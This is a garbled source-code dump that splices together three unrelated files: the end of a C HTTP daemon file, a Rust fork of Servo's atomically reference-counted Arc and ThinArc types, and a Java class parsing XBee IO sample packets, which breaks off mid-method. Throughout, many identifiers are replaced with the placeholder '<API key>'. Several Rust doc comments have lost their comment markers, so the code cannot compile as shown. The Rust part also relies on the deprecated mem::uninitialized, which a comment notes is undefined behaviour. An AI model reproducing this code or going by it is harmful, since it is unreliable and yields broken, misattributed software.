 * Global library deinitialization: release TLS and winsock resources
 * acquired in MHD_init().
 */
void MHD_fini(void)
{
#if HTTPS_SUPPORT
  <API key> ();
#endif
#ifdef _WIN32
  /* Only call WSACleanup if WSAStartup succeeded earlier. */
  if (mhd_winsock_inited_)
    WSACleanup();
#endif
}
<API key>(MHD_init, MHD_fini);
} // namespace libmicrohttpd
} // namespace microrestd
} // namespace ufal
/* end of daemon.c */ |
// file at the top-level directory of this distribution and at
// option. This file may not be copied, modified, or distributed
// except according to those terms.
//! Fork of Arc for Servo. This has the following advantages over std::Arc:
//! * We don't waste storage on the weak reference count.
//! * We don't do extra RMU operations to handle the possibility of weak references.
//! * We can experiment with arena allocation (todo).
//! * We can add methods to support our custom use cases [1].
//! * We have support for dynamically-sized types (see <API key>).
//! * We have support for thin arcs to unsized types (see ThinArc).
// The semantics of Arc are already documented in the Rust docs, so we don't
// duplicate those here.
#![allow(missing_docs)]
#[cfg(feature = "servo")] extern crate serde;
extern crate nodrop;
#[cfg(feature = "servo")]
use heapsize::HeapSizeOf;
use nodrop::NoDrop;
#[cfg(feature = "servo")]
use serde::{Deserialize, Serialize};
use std::{isize, usize};
use std::borrow;
use std::cmp::Ordering;
use std::convert::From;
use std::fmt;
use std::hash::{Hash, Hasher};
use std::iter::{ExactSizeIterator, Iterator};
use std::mem;
use std::ops::{Deref, DerefMut};
use std::process;
use std::ptr;
use std::slice;
use std::sync::atomic;
use std::sync::atomic::Ordering::{Acquire, Relaxed, Release};
// Private macro to get the offset of a struct field in bytes from the address of the struct.
macro_rules! offset_of {
    ($container:path, $field:ident) => {{
        // Make sure the field actually exists. This line ensures that a compile-time error is
        // generated if $field is accessed through a Deref impl.
        let $container { $field: _, .. };
        // Create an (invalid) instance of the container and calculate the offset to its
        // field. Using a null pointer might be UB if `&(*(0 as *const T)).field` is interpreted to
        // be nullptr deref.
        // NOTE(review): `mem::uninitialized` is undefined behavior for many
        // types under current Rust semantics; consider `MaybeUninit` when
        // the toolchain is upgraded.
        let invalid: $container = ::std::mem::uninitialized();
        let offset = &invalid.$field as *const _ as usize - &invalid as *const _ as usize;
        // Do not run destructors on the made up invalid instance.
        ::std::mem::forget(invalid);
        // Offsets are non-negative; returned as isize for pointer arithmetic.
        offset as isize
    }};
}
/// A soft limit on the amount of references that may be made to an `Arc`.
///
/// Going above this limit will abort your program (although not
/// necessarily) at _exactly_ `MAX_REFCOUNT + 1` references.
const MAX_REFCOUNT: usize = (isize::MAX) as usize;
/// Wrapper type for pointers to get the non-zero optimization. When
/// NonZero/Shared/Unique are stabilized, we should just use Shared
/// here to get the same effect. Gankro is working on this in [1].
///
/// It's unfortunate that this needs to infect all the caller types
/// with 'static. It would be nice to just use a &() and a PhantomData<T>
/// instead, but then the compiler can't determine whether the &() should
/// be thin or fat (which depends on whether or not T is sized). Given
/// that this is all a temporary hack, this restriction is fine for now.
///
/// [1] https://github.com/rust-lang/rust/issues/27730
pub struct NonZeroPtrMut<T: ?Sized + 'static>(&'static mut T);

impl<T: ?Sized> NonZeroPtrMut<T> {
    /// Wraps a raw pointer, asserting at runtime that it is non-null.
    pub fn new(ptr: *mut T) -> Self {
        assert!(!(ptr as *mut u8).is_null());
        NonZeroPtrMut(unsafe { mem::transmute(ptr) })
    }

    /// Returns the wrapped raw pointer.
    pub fn ptr(&self) -> *mut T {
        self.0 as *const T as *mut T
    }
}
// Cloning re-wraps the same raw pointer; NonZeroPtrMut is a plain pointer
// wrapper, so no reference count is touched here.
impl<T: ?Sized + 'static> Clone for NonZeroPtrMut<T> {
    fn clone(&self) -> Self {
        NonZeroPtrMut::new(self.ptr())
    }
}

// Formats the wrapped address like a raw pointer.
impl<T: ?Sized + 'static> fmt::Pointer for NonZeroPtrMut<T> {
    fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
        fmt::Pointer::fmt(&self.ptr(), f)
    }
}

// Debug output delegates to Pointer: it prints the address, not the pointee.
impl<T: ?Sized + 'static> fmt::Debug for NonZeroPtrMut<T> {
    fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
        <Self as fmt::Pointer>::fmt(self, f)
    }
}

// Equality is pointer identity, not pointee equality.
impl<T: ?Sized + 'static> PartialEq for NonZeroPtrMut<T> {
    fn eq(&self, other: &Self) -> bool {
        self.ptr() == other.ptr()
    }
}

impl<T: ?Sized + 'static> Eq for NonZeroPtrMut<T> {}
/// Atomically reference-counted shared pointer: the fork of `std::sync::Arc`
/// described in the module docs (no weak-reference support).
pub struct Arc<T: ?Sized + 'static> {
    // Non-null pointer to the shared ArcInner allocation.
    p: NonZeroPtrMut<ArcInner<T>>,
}
An Arc that is known to be uniquely owned
This lets us build arcs that we can mutate before
freezing, without needing to change the allocation
pub struct UniqueArc<T: ?Sized + 'static>(Arc<T>);
impl<T> UniqueArc<T> {
#[inline]
Construct a new UniqueArc
pub fn new(data: T) -> Self {
UniqueArc(Arc::new(data))
}
#[inline]
Convert to a shareable Arc<T> once we're done using it
pub fn shareable(self) -> Arc<T> {
self.0
}
}
// Read access to the payload, same as a regular Arc.
impl<T> Deref for UniqueArc<T> {
    type Target = T;
    fn deref(&self) -> &T {
        &*self.0
    }
}

// Mutable access is sound only because UniqueArc guarantees sole ownership.
impl<T> DerefMut for UniqueArc<T> {
    fn deref_mut(&mut self) -> &mut T {
        // We know this to be uniquely owned
        unsafe { &mut (*self.0.ptr()).data }
    }
}

// An Arc hands out access to T from multiple threads, so both bounds require
// T: Sync + Send (same reasoning as std::sync::Arc).
unsafe impl<T: ?Sized + Sync + Send> Send for Arc<T> {}
unsafe impl<T: ?Sized + Sync + Send> Sync for Arc<T> {}

// The shared heap allocation: one atomic strong count followed by the payload.
// There is no weak count (see the module docs).
struct ArcInner<T: ?Sized> {
    count: atomic::AtomicUsize,
    data: T,
}

unsafe impl<T: ?Sized + Sync + Send> Send for ArcInner<T> {}
unsafe impl<T: ?Sized + Sync + Send> Sync for ArcInner<T> {}
impl<T> Arc<T> {
    /// Allocates a new ArcInner with a strong count of 1, taking ownership of `data`.
    #[inline]
    pub fn new(data: T) -> Self {
        let x = Box::new(ArcInner {
            count: atomic::AtomicUsize::new(1),
            data: data,
        });
        Arc { p: NonZeroPtrMut::new(Box::into_raw(x)) }
    }

    /// Leaks this Arc and returns a pointer to its payload. The refcount is
    /// not decremented; pair with `from_raw` to avoid leaking the allocation.
    pub fn into_raw(this: Self) -> *const T {
        let ptr = unsafe { &((*this.ptr()).data) as *const _ };
        mem::forget(this);
        ptr
    }

    /// Reconstructs an Arc from a pointer previously produced by `into_raw`.
    pub unsafe fn from_raw(ptr: *const T) -> Self {
        // To find the corresponding pointer to the `ArcInner` we need
        // to subtract the offset of the `data` field from the pointer.
        let ptr = (ptr as *const u8).offset(-offset_of!(ArcInner<T>, data));
        Arc {
            p: NonZeroPtrMut::new(ptr as *mut ArcInner<T>),
        }
    }
}
impl<T: ?Sized> Arc<T> {
    // Shared view of the heap allocation (count + payload).
    #[inline]
    fn inner(&self) -> &ArcInner<T> {
        // This unsafety is ok because while this arc is alive we're guaranteed
        // that the inner pointer is valid. Furthermore, we know that the
        // `ArcInner` structure itself is `Sync` because the inner data is
        // `Sync` as well, so we're ok loaning out an immutable pointer to these
        // contents.
        unsafe { &*self.ptr() }
    }

    // Non-inlined part of `drop`. Just invokes the destructor.
    #[inline(never)]
    unsafe fn drop_slow(&mut self) {
        // Re-box the allocation so Box's destructor drops T and frees the memory.
        let _ = Box::from_raw(self.ptr());
    }

    /// True when both Arcs point at the same allocation (pointer identity,
    /// not payload equality).
    #[inline]
    pub fn ptr_eq(this: &Self, other: &Self) -> bool {
        this.ptr() == other.ptr()
    }

    // Raw pointer to the shared ArcInner.
    fn ptr(&self) -> *mut ArcInner<T> {
        self.p.ptr()
    }
}
impl<T: ?Sized> Clone for Arc<T> {
    #[inline]
    fn clone(&self) -> Self {
        // Using a relaxed ordering is alright here, as knowledge of the
        // original reference prevents other threads from erroneously deleting
        // the object.
        //
        // As explained in the [Boost documentation][1], Increasing the
        // reference counter can always be done with memory_order_relaxed: New
        // references to an object can only be formed from an existing
        // reference, and passing an existing reference from one thread to
        // another must already provide any required synchronization.
        let old_size = self.inner().count.fetch_add(1, Relaxed);

        // However we need to guard against massive refcounts in case someone
        // is `mem::forget`ing Arcs. If we don't do this the count can overflow
        // and users will use-after free. We racily saturate to `isize::MAX` on
        // the assumption that there aren't ~2 billion threads incrementing
        // the reference count at once. This branch will never be taken in
        // any realistic program.
        //
        // We abort because such a program is incredibly degenerate, and we
        // don't care to support it.
        if old_size > MAX_REFCOUNT {
            process::abort();
        }

        Arc { p: NonZeroPtrMut::new(self.ptr()) }
    }
}
// Borrowing the payload is always safe: the allocation outlives every handle.
impl<T: ?Sized> Deref for Arc<T> {
    type Target = T;

    #[inline]
    fn deref(&self) -> &T {
        &self.inner().data
    }
}
impl<T: Clone> Arc<T> {
    /// Clone-on-write access: returns a mutable reference to the payload,
    /// first cloning it into a fresh allocation if other handles exist.
    #[inline]
    pub fn make_mut(this: &mut Self) -> &mut T {
        if !this.is_unique() {
            // Another pointer exists; clone
            *this = Arc::new((**this).clone());
        }

        unsafe {
            // This unsafety is ok because we're guaranteed that the pointer
            // returned is the *only* pointer that will ever be returned to T. Our
            // reference count is guaranteed to be 1 at this point, and we required
            // the Arc itself to be `mut`, so we're returning the only possible
            // reference to the inner data.
            &mut (*this.ptr()).data
        }
    }
}
impl<T: ?Sized> Arc<T> {
    /// Returns a mutable reference to the payload iff this Arc is the sole owner.
    #[inline]
    pub fn get_mut(this: &mut Self) -> Option<&mut T> {
        if this.is_unique() {
            unsafe {
                // See make_mut() for documentation of the threadsafety here.
                Some(&mut (*this.ptr()).data)
            }
        } else {
            None
        }
    }

    // True when the strong count is exactly 1 (no other handles exist).
    #[inline]
    fn is_unique(&self) -> bool {
        // We can use Relaxed here, but the justification is a bit subtle.
        //
        // The reason to use Acquire would be to synchronize with other threads
        // that are modifying the refcount with Release, i.e. to ensure that
        // their writes to memory guarded by this refcount are flushed. However,
        // we know that threads only modify the contents of the Arc when they
        // observe the refcount to be 1, and no other thread could observe that
        // because we're holding one strong reference here.
        self.inner().count.load(Relaxed) == 1
    }
}
impl<T: ?Sized> Drop for Arc<T> {
    #[inline]
    fn drop(&mut self) {
        // Because `fetch_sub` is already atomic, we do not need to synchronize
        // with other threads unless we are going to delete the object.
        if self.inner().count.fetch_sub(1, Release) != 1 {
            return;
        }

        // FIXME(bholley): Use the updated comment when [2] is merged.
        //
        // This load is needed to prevent reordering of use of the data and
        // deletion of the data. Because it is marked `Release`, the decreasing
        // of the reference count synchronizes with this `Acquire` load. This
        // means that use of the data happens before decreasing the reference
        // count, which happens before this load, which happens before the
        // deletion of the data.
        //
        // As explained in the [Boost documentation][1],
        //
        // > It is important to enforce any possible access to the object in one
        // > thread (through an existing reference) to *happen before* deleting
        // > the object in a different thread. This is achieved by a "release"
        // > operation after dropping a reference (any access to the object
        // > through this reference must obviously happened before), and an
        // > "acquire" operation before deleting the object.
        self.inner().count.load(Acquire);

        unsafe {
            // Last handle gone: run T's destructor and free the allocation.
            self.drop_slow();
        }
    }
}
// All comparisons delegate to the payload `T`, giving Arc value semantics:
// two Arcs to different allocations with equal contents compare equal.
impl<T: ?Sized + PartialEq> PartialEq for Arc<T> {
    fn eq(&self, other: &Arc<T>) -> bool {
        *(*self) == *(*other)
    }

    fn ne(&self, other: &Arc<T>) -> bool {
        *(*self) != *(*other)
    }
}

impl<T: ?Sized + PartialOrd> PartialOrd for Arc<T> {
    fn partial_cmp(&self, other: &Arc<T>) -> Option<Ordering> {
        (**self).partial_cmp(&**other)
    }

    fn lt(&self, other: &Arc<T>) -> bool {
        *(*self) < *(*other)
    }

    fn le(&self, other: &Arc<T>) -> bool {
        *(*self) <= *(*other)
    }

    fn gt(&self, other: &Arc<T>) -> bool {
        *(*self) > *(*other)
    }

    fn ge(&self, other: &Arc<T>) -> bool {
        *(*self) >= *(*other)
    }
}

impl<T: ?Sized + Ord> Ord for Arc<T> {
    fn cmp(&self, other: &Arc<T>) -> Ordering {
        (**self).cmp(&**other)
    }
}

impl<T: ?Sized + Eq> Eq for Arc<T> {}
// Display/Debug delegate to the payload; Pointer prints the allocation address.
impl<T: ?Sized + fmt::Display> fmt::Display for Arc<T> {
    fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
        fmt::Display::fmt(&**self, f)
    }
}

impl<T: ?Sized + fmt::Debug> fmt::Debug for Arc<T> {
    fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
        fmt::Debug::fmt(&**self, f)
    }
}

impl<T: ?Sized> fmt::Pointer for Arc<T> {
    fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
        fmt::Pointer::fmt(&self.ptr(), f)
    }
}

// Default allocates a fresh Arc around T's default value.
impl<T: Default> Default for Arc<T> {
    fn default() -> Arc<T> {
        Arc::new(Default::default())
    }
}

// Hashing delegates to the payload, so Arc<T> hashes like T.
impl<T: ?Sized + Hash> Hash for Arc<T> {
    fn hash<H: Hasher>(&self, state: &mut H) {
        (**self).hash(state)
    }
}

impl<T> From<T> for Arc<T> {
    fn from(t: T) -> Self {
        Arc::new(t)
    }
}

// Borrow/AsRef expose the payload by reference.
impl<T: ?Sized> borrow::Borrow<T> for Arc<T> {
    fn borrow(&self) -> &T {
        &**self
    }
}

impl<T: ?Sized> AsRef<T> for Arc<T> {
    fn as_ref(&self) -> &T {
        &**self
    }
}
// This is what the HeapSize crate does for regular arc, but is questionably
// sound for shared pointers: the payload is measured once per handle, so
// shared data may be double-counted. NOTE(review): confirm this matches how
// the rest of the codebase accounts for Arc-shared allocations.
#[cfg(feature = "servo")]
impl<T: HeapSizeOf> HeapSizeOf for Arc<T> {
    fn <API key>(&self) -> usize {
        (**self).<API key>()
    }
}

// Deserialization builds a fresh Arc around the deserialized payload.
#[cfg(feature = "servo")]
impl<'de, T: Deserialize<'de>> Deserialize<'de> for Arc<T>
{
    fn deserialize<D>(deserializer: D) -> Result<Arc<T>, D::Error>
    where
        D: ::serde::de::Deserializer<'de>,
    {
        T::deserialize(deserializer).map(Arc::new)
    }
}

// Serialization writes only the payload; sharing is not preserved on the wire.
#[cfg(feature = "servo")]
impl<T: Serialize> Serialize for Arc<T>
{
    fn serialize<S>(&self, serializer: S) -> Result<S::Ok, S::Error>
    where
        S: ::serde::ser::Serializer,
    {
        (**self).serialize(serializer)
    }
}
/// Structure to allow Arc-managing some fixed-sized data and a variably-sized
/// slice in a single allocation.
#[derive(Debug, Eq, PartialEq, PartialOrd)]
pub struct HeaderSlice<H, T: ?Sized> {
    /// The fixed-sized data.
    pub header: H,

    /// The dynamically-sized data.
    pub slice: T,
}
/// Divides `dividend` by `divisor`, rounding up to the next whole number.
///
/// Implemented with div + mod rather than `(dividend + divisor - 1) / divisor`
/// so the intermediate sum cannot overflow for dividends near `usize::MAX`.
/// Panics (divide by zero) when `divisor == 0`, same as the naive form.
#[inline(always)]
fn divide_rounding_up(dividend: usize, divisor: usize) -> usize {
    dividend / divisor + if dividend % divisor == 0 { 0 } else { 1 }
}
impl<H, T> Arc<HeaderSlice<H, [T]>> {
Creates an Arc for a HeaderSlice using the given header struct and
iterator to generate the slice. The resulting Arc will be fat.
#[inline]
pub fn <API key><I>(header: H, mut items: I) -> Self
where I: Iterator<Item=T> + ExactSizeIterator
{
use ::std::mem::size_of;
assert!(size_of::<T>() != 0, "Need to think about ZST");
// Compute the required size for the allocation.
let num_items = items.len();
let size = {
// First, determine the alignment of a hypothetical pointer to a
// HeaderSlice.
let <API key>: usize = mem::align_of::<ArcInner<HeaderSlice<H, [T; 1]>>>();
// Next, synthesize a totally garbage (but properly aligned) pointer
// to a sequence of T.
let fake_slice_ptr = <API key> as *const T;
// Convert that sequence to a fat pointer. The address component of
// the fat pointer will be garbage, but the length will be correct.
let fake_slice = unsafe { slice::from_raw_parts(fake_slice_ptr, num_items) };
// Pretend the garbage address points to our allocation target (with
// a trailing sequence of T), rather than just a sequence of T.
let fake_ptr = fake_slice as *const [T] as *const ArcInner<HeaderSlice<H, [T]>>;
let fake_ref: &ArcInner<HeaderSlice<H, [T]>> = unsafe { &*fake_ptr };
// Use size_of_val, which will combine static information about the
// type with the length from the fat pointer. The garbage address
// will not be used.
mem::size_of_val(fake_ref)
};
let ptr: *mut ArcInner<HeaderSlice<H, [T]>>;
unsafe {
// Allocate the buffer. We use Vec because the underlying allocation
// machinery isn't available in stable Rust.
// To avoid alignment issues, we allocate words rather than bytes,
// rounding up to the nearest word size.
let buffer = if mem::align_of::<T>() <= mem::align_of::<usize>() {
Self::allocate_buffer::<usize>(size)
} else if mem::align_of::<T>() <= mem::align_of::<u64>() {
// On 32-bit platforms <T> may have 8 byte alignment while usize has 4 byte aligment.
// Use u64 to avoid over-alignment.
// This branch will compile away in optimized builds.
Self::allocate_buffer::<u64>(size)
} else {
panic!("Over-aligned type not handled");
};
// Synthesize the fat pointer. We do this by claiming we have a direct
// pointer to a [T], and then changing the type of the borrow. The key
// point here is that the length portion of the fat pointer applies
// only to the number of elements in the dynamically-sized portion of
// the type, so the value will be the same whether it points to a [T]
// or something else with a [T] as its last member.
let fake_slice: &mut [T] = slice::from_raw_parts_mut(buffer as *mut T, num_items);
ptr = fake_slice as *mut [T] as *mut ArcInner<HeaderSlice<H, [T]>>;
// Write the data.
// Note that any panics here (i.e. from the iterator) are safe, since
// we'll just leak the uninitialized memory.
ptr::write(&mut ((*ptr).count), atomic::AtomicUsize::new(1));
ptr::write(&mut ((*ptr).data.header), header);
let mut current: *mut T = &mut (*ptr).data.slice[0];
for _ in 0..num_items {
ptr::write(current, items.next().expect("ExactSizeIterator over-reported length"));
current = current.offset(1);
}
assert!(items.next().is_none(), "ExactSizeIterator under-reported length");
// We should have consumed the buffer exactly.
debug_assert!(current as *mut u8 == buffer.offset(size as isize));
}
// Return the fat Arc.
assert_eq!(size_of::<Self>(), size_of::<usize>() * 2, "The Arc will be fat");
Arc { p: NonZeroPtrMut::new(ptr) }
}
#[inline]
unsafe fn allocate_buffer<W>(size: usize) -> *mut u8 {
let words_to_allocate = divide_rounding_up(size, mem::size_of::<W>());
let mut vec = Vec::<W>::with_capacity(words_to_allocate);
vec.set_len(words_to_allocate);
Box::into_raw(vec.into_boxed_slice()) as *mut W as *mut u8
}
}
/// Header data with an inline length. Consumers that use HeaderWithLength as the
/// Header type in HeaderSlice can take advantage of ThinArc.
#[derive(Debug, Eq, PartialEq, PartialOrd)]
pub struct HeaderWithLength<H> {
    /// The fixed-sized data.
    pub header: H,

    /// The slice length.
    length: usize,
}

impl<H> HeaderWithLength<H> {
    /// Creates a new HeaderWithLength.
    pub fn new(header: H, length: usize) -> Self {
        HeaderWithLength {
            header: header,
            length: length,
        }
    }
}
// A HeaderSlice whose header also records the slice length inline.
type <API key><H, T> = HeaderSlice<HeaderWithLength<H>, T>;

// A "thin" (single-word) handle to an Arc'd header + slice. The slice length
// lives inside the header, so the fat-pointer metadata can be reconstructed
// on demand by thin_to_thick below.
pub struct ThinArc<H: 'static, T: 'static> {
    ptr: *mut ArcInner<<API key><H, [T; 1]>>,
}

unsafe impl<H: Sync + Send, T: Sync + Send> Send for ThinArc<H, T> {}
unsafe impl<H: Sync + Send, T: Sync + Send> Sync for ThinArc<H, T> {}

// Synthesize a fat pointer from a thin pointer.
//
// See the comment around the analogous operation in <API key>.
fn thin_to_thick<H, T>(thin: *mut ArcInner<<API key><H, [T; 1]>>)
    -> *mut ArcInner<<API key><H, [T]>>
{
    // Read the true slice length out of the header...
    let len = unsafe { (*thin).data.header.length };
    // ...and pair it with the thin address to rebuild the fat pointer.
    let fake_slice: *mut [T] = unsafe {
        slice::from_raw_parts_mut(thin as *mut T, len)
    };

    fake_slice as *mut ArcInner<<API key><H, [T]>>
}
impl<H: 'static, T: 'static> ThinArc<H, T> {
Temporarily converts |self| into a bonafide Arc and exposes it to the
provided callback. The refcount is not modified.
#[inline(always)]
pub fn with_arc<F, U>(&self, f: F) -> U
where F: FnOnce(&Arc<<API key><H, [T]>>) -> U
{
// Synthesize transient Arc, which never touches the refcount of the ArcInner.
let transient = NoDrop::new(Arc {
p: NonZeroPtrMut::new(thin_to_thick(self.ptr))
});
// Expose the transient Arc to the callback, which may clone it if it wants.
let result = f(&transient);
// Forget the transient Arc to leave the refcount untouched.
mem::forget(transient);
// Forward the result.
result
}
}
// Deref rebuilds the fat pointer, then borrows the header+slice payload.
impl<H, T> Deref for ThinArc<H, T> {
    type Target = <API key><H, [T]>;
    fn deref(&self) -> &Self::Target {
        unsafe { &(*thin_to_thick(self.ptr)).data }
    }
}

// Clone round-trips through a transient fat Arc so the refcount is bumped.
impl<H: 'static, T: 'static> Clone for ThinArc<H, T> {
    fn clone(&self) -> Self {
        ThinArc::with_arc(self, |a| Arc::into_thin(a.clone()))
    }
}

// Drop materializes a fat Arc and lets its Drop perform the refcount
// decrement (and, if last, the deallocation).
impl<H: 'static, T: 'static> Drop for ThinArc<H, T> {
    fn drop(&mut self) {
        let _ = Arc::from_thin(ThinArc { ptr: self.ptr });
    }
}
impl<H: 'static, T: 'static> Arc<<API key><H, [T]>> {
    /// Converts an Arc into a ThinArc. This consumes the Arc, so the refcount
    /// is not modified.
    pub fn into_thin(a: Self) -> ThinArc<H, T> {
        assert!(a.header.length == a.slice.len(),
                "Length needs to be correct for ThinArc to work");
        let fat_ptr: *mut ArcInner<<API key><H, [T]>> = a.ptr();
        mem::forget(a);
        let thin_ptr = fat_ptr as *mut [usize] as *mut usize;
        ThinArc {
            ptr: thin_ptr as *mut ArcInner<<API key><H, [T; 1]>>
        }
    }

    /// Converts a ThinArc into an Arc. This consumes the ThinArc, so the refcount
    /// is not modified.
    pub fn from_thin(a: ThinArc<H, T>) -> Self {
        let ptr = thin_to_thick(a.ptr);
        mem::forget(a);
        Arc {
            p: NonZeroPtrMut::new(ptr)
        }
    }
}
// Equality compares the pointed-to header + slice contents via transient
// fat Arcs (value semantics, not pointer identity).
impl<H: PartialEq + 'static, T: PartialEq + 'static> PartialEq for ThinArc<H, T> {
    fn eq(&self, other: &ThinArc<H, T>) -> bool {
        ThinArc::with_arc(self, |a| {
            ThinArc::with_arc(other, |b| {
                *a == *b
            })
        })
    }
}

impl<H: Eq + 'static, T: Eq + 'static> Eq for ThinArc<H, T> {}

#[cfg(test)]
mod tests {
    use std::clone::Clone;
    use std::ops::Drop;
    use std::sync::atomic;
    use std::sync::atomic::Ordering::{Acquire, SeqCst};
    use super::{Arc, HeaderWithLength, ThinArc};

    // Bumps a shared counter when dropped, so the test can count destructor runs.
    #[derive(PartialEq)]
    struct Canary(*mut atomic::AtomicUsize);

    impl Drop for Canary {
        fn drop(&mut self) {
            unsafe { (*self.0).fetch_add(1, SeqCst); }
        }
    }

    #[test]
    fn slices_and_thin() {
        let mut canary = atomic::AtomicUsize::new(0);
        let c = Canary(&mut canary as *mut atomic::AtomicUsize);
        let v = vec![5, 6];
        let header = HeaderWithLength::new(c, v.len());
        {
            // Exercise thin<->fat conversions, cloning, and equality...
            let x = Arc::into_thin(Arc::<API key>(header, v.into_iter()));
            let y = ThinArc::with_arc(&x, |q| q.clone());
            let _ = y.clone();
            let _ = x == x;
            Arc::from_thin(x.clone());
        }
        // ...then verify the header's Canary was dropped exactly once.
        assert!(canary.load(Acquire) == 1);
    }
}
package com.digi.xbee.api.packet.common;
import java.io.<API key>;
import java.io.IOException;
import java.util.Arrays;
import java.util.LinkedHashMap;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import com.digi.xbee.api.exceptions.<API key>;
import com.digi.xbee.api.io.IOLine;
import com.digi.xbee.api.io.IOSample;
import com.digi.xbee.api.models.XBee16BitAddress;
import com.digi.xbee.api.models.XBee64BitAddress;
import com.digi.xbee.api.packet.APIFrameType;
import com.digi.xbee.api.packet.XBeeAPIPacket;
import com.digi.xbee.api.utils.ByteUtils;
import com.digi.xbee.api.utils.HexUtils;
/**
* This class represents an IO Data Sample RX Indicator packet. Packet is built
* using the parameters of the constructor or providing a valid API payload.
*
* <p>When the module receives an IO sample frame from a remote device, it
* sends the sample out the UART using this frame type (when AO=0). Only modules
* running API firmware will send IO samples out the UART.</p>
*
* <p>Among received data, some options can also be received indicating
* transmission parameters.</p>
*
* @see com.digi.xbee.api.models.XBeeReceiveOptions
* @see com.digi.xbee.api.packet.XBeeAPIPacket
*/
public class <API key> extends XBeeAPIPacket {
// Constants.
private static final int <API key> = 12; // 1 (Frame type) + 8 (32-bit address) + 2 (16-bit address) + 1 (receive options)
// Variables.
private final XBee64BitAddress sourceAddress64;
private final XBee16BitAddress sourceAddress16;
private IOSample ioSample;
private final int receiveOptions;
private byte[] rfData;
private Logger logger;
/**
* Creates a new {@code <API key>} object from the
* given payload.
*
* @param payload The API frame payload. It must start with the frame type
* corresponding to a IO Data Sample RX Indicator packet ({@code 0x92}).
* The byte array must be in {@code OperatingMode.API} mode.
*
* @return Parsed IO Data Sample Rx Indicator packet.
*
* @throws <API key> if {@code payload[0] != APIFrameType.<API key>.getValue()} or
* if {@code payload.length < }{@value #<API key>} or
* if {@code receiveOptions < 0} or
* if {@code receiveOptions > 255}.
* @throws <API key> if {@code payload == null}.
*/
public static <API key> createPacket(byte[] payload) {
if (payload == null)
throw new <API key>("IO Data Sample RX Indicator packet payload cannot be null.");
// 1 (Frame type) + 8 (32-bit address) + 2 (16-bit address) + 1 (receive options)
if (payload.length < <API key>)
throw new <API key>("Incomplete IO Data Sample RX Indicator packet.");
if ((payload[0] & 0xFF) != APIFrameType.<API key>.getValue())
throw new <API key>("Payload is not a IO Data Sample RX Indicator packet.");
// payload[0] is the frame type.
int index = 1;
// 2 bytes of 16-bit address.
XBee64BitAddress sourceAddress64 = new XBee64BitAddress(Arrays.copyOfRange(payload, index, index + 8));
index = index + 8;
// 2 bytes of 16-bit address.
XBee16BitAddress sourceAddress16 = new XBee16BitAddress(payload[index] & 0xFF, payload[index + 1] & 0xFF);
index = index + 2;
// Receive options
int receiveOptions = payload[index] & 0xFF;
index = index + 1;
// Get data.
byte[] data = null;
if (index < payload.length)
data = Arrays.copyOfRange(payload, index, payload.length);
return new <API key>(sourceAddress64, sourceAddress16, receiveOptions, data);
}
/**
* Class constructor. Instantiates a new
* {@code <API key>} object with the given parameters.
*
* @param sourceAddress64 64-bit address of the sender.
* @param sourceAddress16 16-bit address of the sender.
* @param receiveOptions Receive options.
* @param rfData Received RF data.
*
* @throws <API key> if {@code receiveOptions < 0} or
* if {@code receiveOptions > 255}.
* @throws <API key> if {@code sourceAddress64 == null} or
* if {@code sourceAddress16 == null}.
*
* @see com.digi.xbee.api.models.XBeeReceiveOptions
* @see com.digi.xbee.api.models.XBee16BitAddress
* @see com.digi.xbee.api.models.XBee64BitAddress
*/
public <API key>(XBee64BitAddress sourceAddress64, XBee16BitAddress sourceAddress16, int receiveOptions, byte[] rfData) {
super(APIFrameType.<API key>);
if (sourceAddress64 == null)
throw new <API key>("64-bit source address cannot be null.");
if (sourceAddress16 == null)
throw new <API key>("16-bit source address cannot be null.");
if (receiveOptions < 0 || receiveOptions > 255)
throw new <API key>("Receive options value must be between 0 and 255.");
this.sourceAddress64 = sourceAddress64;
this.sourceAddress16 = sourceAddress16;
this.receiveOptions = receiveOptions;
this.rfData = rfData;
if (rfData != null && rfData.length >= 5)
ioSample = new IOSample(rfData);
else
ioSample = null;
this.logger = LoggerFactory.getLogger(<API key>.class);
}
/*
* (non-Javadoc)
* @see com.digi.xbee.api.packet.XBeeAPIPacket#getAPIData()
*/
@Override
protected byte[] <API key>() {
<API key> os = new <API key>();
try {
os.write(sourceAddress64.getValue());
os.write(sourceAddress16.getValue());
os.write(receiveOptions);
if (rfData != null)
os.write(rfData);
} catch (IOException e) {
logger.error(e.getMessage(), e);
}
return os.toByteArray();
}
/*
* (non-Javadoc)
* @see com.digi.xbee.api.packet.XBeeAPIPacket#needsAPIFrameID()
*/
@Override
public boolean needsAPIFrameID() {
return false;
}
/*
* (non-Javadoc)
* @see com.digi.xbee.api.packet.XBeeAPIPacket#isBroadcast()
*/
@Override
public boolean isBroadcast() {
return ByteUtils.isBitEnabled(getReceiveOptions(), 1);
}
/**
* Returns the 64-bit sender/source address.
*
* @return The 64-bit sender/source address.
*
* @see com.digi.xbee.api.models.XBee64BitAddress
*/
public XBee64BitAddress <API key>() {
return sourceAddress64;
}
/**
* Returns the 16-bit sender/source address.
*
* @return 16-bit sender/source address.
*
* @see com.digi.xbee.api.models.XBee16BitAddress
*/
public XBee16BitAddress <API key>() {
return sourceAddress16;
}
/**
* Returns the receive options.
*
* @return Receive options.
*
* @see com.digi.xbee.api.models.XBeeReceiveOptions
*/
public int getReceiveOptions() {
return receiveOptions;
}
/**
* Returns the IO sample corresponding to the data contained in the packet.
*
* @return The IO sample of the packet, {@code null} if the packet has not
* any data or if the sample could not be generated correctly.
*
* @see com.digi.xbee.api.io.IOSample
*/
public IOSample getIOSample() {
return ioSample;
}
/**
* Sets the received RF data.
*
* @param rfData Received RF data.
*/
public void setRFData(byte[] rfData) {
if (rfData == null)
this.rfData = null;
else
this.rfData = Arrays.copyOf(rfData, rfData.length);
// Modify the ioSample accordingly.
if (rfData != null && rfData.length >= 5)
ioSample = new IOSample(this.rfData);
else
ioSample = null;
}
/**
* Returns the received RF data.
*
* @return Received RF data.
*/
public byte[] getRFData() {
if (rfData == null)
return null;
return Arrays.copyOf(rfData, rfData.length);
}
/*
* (non-Javadoc)
* @see com.digi.xbee.api.packet.XBeeAPIPacket#<API key>()
*/
@Override
public LinkedHashMap<String, String> <API key>() {
LinkedHashMap<String, String> parameters = new LinkedHashMap<String, String>();
